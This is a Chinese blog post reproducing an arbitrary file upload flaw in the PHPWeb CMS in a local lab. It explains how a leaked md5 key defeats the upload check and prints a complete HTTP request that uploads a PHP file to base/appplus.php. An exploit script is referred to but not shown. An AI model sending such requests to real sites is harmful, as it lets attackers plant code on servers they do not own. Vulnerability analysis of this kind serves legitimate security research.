phpweb前台任意文件上传漏洞复现和分析

少羽.
少羽.
少羽.
429
文章
88
评论
2020年1月31日19:18:39 18 4,810 2714字阅读9分2秒
广告也精彩

测试代码

一、环境搭建

宝塔Windows 6.5.0    +Nginx 1.17 + PHP 5.2 (PS:注意5.2最稳 其他版本可能报错)phpweb前台任意文件上传漏洞复现和分析

安装成功之后。分析代码

首先找到

base/appplus.php phpweb前台任意文件上传漏洞复现和分析

主要代码如下:

//密钥校验
$k=md5(strrev($dbUser.$dbPass));
$h=$_SERVER["HTTP_REFERER"];
$t=$_POST["t"];
$m=$_POST["m"];
$act=$_POST["act"];
$path=$_POST["path"];

$md5=md5($k.$t);
if($m!=$md5){
	echo "ERROR: 安全性校验错误";
	exit;
}

关键点在于

$k=md5(strrev($dbUser.$dbPass));

phpweb前台任意文件上传漏洞复现和分析

在同级搜索中,发现POST.php 会返回$k=md5(strrev($dbUser.$dbPass));

那么就是post base/post.php 参数传递一个act 如下:phpweb前台任意文件上传漏洞复现和分析

这里就是返回了 $md5=md5($k.$t); 上面所需要的$k 和$t

那么只要md5 一下就可以得到$md5

如下:phpweb前台任意文件上传漏洞复现和分析

那么数据包如下。发送 phpweb前台任意文件上传漏洞复现和分析

POST /base/appplus.php HTTP/1.1
Host: 192.168.1.210
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------191691572411478
Content-Length: 746
Connection: close
Cookie: CODEIMG=325eaeac5bef34937cfdc1bd73034d17
Upgrade-Insecure-Requests: 1

-----------------------------191691572411478
Content-Disposition: form-data; name="act"

upload
-----------------------------191691572411478
Content-Disposition: form-data; name="m"

59f9fae38f9e6ba22c2816e3d17588d4
-----------------------------191691572411478
Content-Disposition: form-data; name="t"

1579254040
-----------------------------191691572411478
Content-Disposition: form-data; name="path"

upload
-----------------------------191691572411478
Content-Disposition: form-data; name="r_size"

18
-----------------------------191691572411478
Content-Disposition: form-data; name="file"; filename="1111.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------191691572411478--

然后感觉这样太麻烦了。就写了一个python的脚本

此处为隐藏的内容!
发表评论并刷新,方可查看

phpweb前台任意文件上传漏洞复现和分析

执行的方式

python    aaa.py http://192.168.1.210
继续阅读
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
广告也精彩
少羽.
  • 本文由 发表于 2020年1月31日19:18:39
  • 除非特殊声明,本站文章均为原创,转载请务必保留本文链接
导航网站自动收录漏洞-劫持漏洞 漏洞分析

导航网站自动收录漏洞-劫持漏洞

我想搞个导航网站来着,看着自动收录的网站然后就发现了很多导航网站有这个bug BUG后果:可以在网站上上传任意js html代码,会被劫持,跳转等等。 BUG原因: 大家看图,只要我在我的网站上面,做...
广告也精彩
匿名

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:

评论:18   其中:访客  18   博主  0
    • 1123 1123 0

      牛逼啊

      • 2799739595 2799739595 0

        看看

        • zz zz 0

          很强

          • 12 12 1

            看看看看

            • 戴维斯 戴维斯 1

              牛逼啊

              • testing testing 1

                谢谢

                • 看看 看看 0

                  看看

                  • test404 test404 0

                    学习一下

                    • 风飞舞 风飞舞 0

                      看看,谢谢大佬

                      • 无心 无心 3

                        少羽牛逼牛逼

                        • 猪肝 猪肝 0

                          看看

                          • chengel chengel 0

                            大佬,求该版本的phpweb源码,谢谢

                            • 123 123 0

                              6666牛逼

                              • 6663 6663 0

                                看看

                                • leon121 leon121 1

                                  wee士大夫

                                  • 111 111 0

                                    牛逼

                                    • jieyun jieyun 1

                                      学习了,大牛

                                      • 11111 11111 0

                                        看看